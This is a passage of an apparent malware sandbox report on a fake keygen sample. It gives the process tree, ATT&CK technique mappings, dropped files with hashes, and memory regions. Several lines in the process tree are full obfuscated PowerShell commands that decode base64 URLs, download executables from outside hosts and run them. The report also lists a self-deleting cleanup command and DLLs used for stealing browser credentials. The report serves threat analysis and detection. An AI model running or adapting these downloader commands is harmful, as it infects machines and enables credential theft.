                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:548
                  • C:\Users\Public\avr.exe
                    "C:\Users\Public\avr.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2568
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:2052
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1876
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:328
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:112
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:2624
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:2188
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2268
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2268 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\359463886712429\\* & exit
                            9⤵
                              PID:316
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2268
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2292
                      • C:\Users\Public\avr.exe
                        "C:\Users\Public\avr.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2688
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:760
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:924
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1120
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:916
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1884
                    • C:\Users\Public\jow.exe
                      "C:\Users\Public\jow.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2624
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2852
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2352
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 836
                            8⤵
                            • Loads dropped DLL
                            • Program crash
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2928
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2904
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2444
                      • C:\Users\Public\jow.exe
                        "C:\Users\Public\jow.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2976
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:816
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1628

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Modify Existing Service

            1
            T1031

            Defense Evasion

            Modify Registry

            4
            T1112

            Disabling Security Tools

            2
            T1089

            Install Root Certificate

            1
            T1130

            Credential Access

            Credentials in Files

            3
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            2
            T1082

            Collection

            Data from Local System

            3
            T1005

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\freebl3.dll
            • C:\ProgramData\freebl3.dll
            • C:\ProgramData\mozglue.dll
            • C:\ProgramData\mozglue.dll
            • C:\ProgramData\msvcp140.dll
            • C:\ProgramData\msvcp140.dll
            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\vcruntime140.dll
            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_713942c5-623b-4fe8-abb0-085d7e1b1405
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_92dde251-1ca5-462a-b1b9-ccf991dd9322
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a393003d-ef7a-4bf2-bbd4-6acc785bf5ef
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff88a5f3-24da-43db-9330-360faf4e6d97
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\b.hta
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\b1.hta
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba.hta
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\ba1.hta
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\m.hta
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\m1.hta
            • C:\Users\Admin\AppData\Local\Temp\3949.tmp\start.bat
            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
            • C:\Users\Admin\AppData\Local\Temp\ZVJJp5mdOO.exe
            • C:\Users\Admin\AppData\Local\Temp\ZVJJp5mdOO.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\lj3renaTmX.exe
            • C:\Users\Admin\AppData\Local\Temp\lj3renaTmX.exe
            • C:\Users\Admin\AppData\Local\Temp\yC0y1LzTdd.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

              SHA256

              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

              SHA512

              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

            • C:\Users\Admin\AppData\Local\Temp\z4itidaAyK.exe
            • C:\Users\Admin\AppData\Local\Temp\z4itidaAyK.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Public\avr.exe
            • C:\Users\Public\avr.exe
            • C:\Users\Public\avr.exe
            • C:\Users\Public\jow.exe
            • C:\Users\Public\jow.exe
            • C:\Users\Public\jow.exe
            • C:\Users\Public\wod.exe
            • C:\Users\Public\wod.exe
            • C:\Users\Public\wod.exe
            • C:\Windows\temp\lhorgh3k.inf
            • \??\PIPE\lsarpc
            • \??\PIPE\srvsvc
            • \ProgramData\mozglue.dll
            • \ProgramData\mozglue.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\sqlite3.dll
            • \ProgramData\sqlite3.dll
            • \ProgramData\vcruntime140.dll
            • \ProgramData\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
              MD5

              02cc7b8ee30056d5912de54f1bdfc219

              SHA1

              a6923da95705fb81e368ae48f93d28522ef552fb

              SHA256

              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

              SHA512

              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\sqlite3.dll
            • \Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\ZVJJp5mdOO.exe
            • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Admin\AppData\Local\Temp\lj3renaTmX.exe
            • \Users\Admin\AppData\Local\Temp\yC0y1LzTdd.exe
              MD5

              013db621a3351e3fb049efd2ccad79ff

              SHA1

              a23394ea54dbc5342a77938a2c285ee616185560

              SHA256

              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

              SHA512

              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

            • \Users\Admin\AppData\Local\Temp\z4itidaAyK.exe
            • \Users\Public\avr.exe
            • \Users\Public\jow.exe
            • \Users\Public\jow.exe
            • \Users\Public\wod.exe
            • \Users\Public\wod.exe
            • memory/112-305-0x0000000000390000-0x00000000003B4000-memory.dmp
              Filesize

              144KB

            • memory/112-298-0x00000000001F0000-0x00000000001F1000-memory.dmp
              Filesize

              4KB

            • memory/112-292-0x0000000000000000-mapping.dmp
            • memory/112-296-0x0000000000C20000-0x0000000000C21000-memory.dmp
              Filesize

              4KB

            • memory/112-294-0x000000006FEE0000-0x00000000705CE000-memory.dmp
              Filesize

              6.9MB

            • memory/316-312-0x0000000000000000-mapping.dmp
            • memory/328-295-0x0000000002670000-0x0000000002674000-memory.dmp
              Filesize

              16KB

            • memory/328-278-0x0000000000000000-mapping.dmp
            • memory/548-35-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/548-23-0x0000000000000000-mapping.dmp
            • memory/760-20-0x0000000000000000-mapping.dmp
            • memory/816-29-0x0000000000000000-mapping.dmp
            • memory/916-27-0x0000000000000000-mapping.dmp
            • memory/924-77-0x0000000006490000-0x0000000006491000-memory.dmp
              Filesize

              4KB

            • memory/924-36-0x0000000001130000-0x0000000001131000-memory.dmp
              Filesize

              4KB

            • memory/924-34-0x00000000712C0000-0x00000000719AE000-memory.dmp
              Filesize

              6.9MB

            • memory/924-141-0x0000000006700000-0x0000000006701000-memory.dmp
              Filesize

              4KB

            • memory/924-22-0x0000000000000000-mapping.dmp
            • memory/924-70-0x0000000006330000-0x0000000006331000-memory.dmp
              Filesize

              4KB

            • memory/924-118-0x0000000006620000-0x0000000006621000-memory.dmp
              Filesize

              4KB

            • memory/924-69-0x0000000006280000-0x0000000006281000-memory.dmp
              Filesize

              4KB

